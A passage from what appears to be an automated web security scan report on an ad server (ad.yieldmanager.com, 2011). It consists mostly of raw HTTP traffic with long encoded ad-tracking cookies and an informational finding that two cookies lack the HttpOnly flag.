n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%2!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0~~!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y~~!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 14:28:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; path=/; expires=Thu, 18-Jul-2013 14:28:36 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=xRqLCMXtwQIQq5e67QM&guid=ON&script=0
Cache-Control: no-store
Last-Modified: Tue, 19 Jul 2011 14:28:36 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

14.22. http://ad.yieldmanager.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%3!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D![~~!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bTx~~!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; path=/; expires=Thu, 18-Jul-2013 20:25:58 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=845380&id=1059013&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!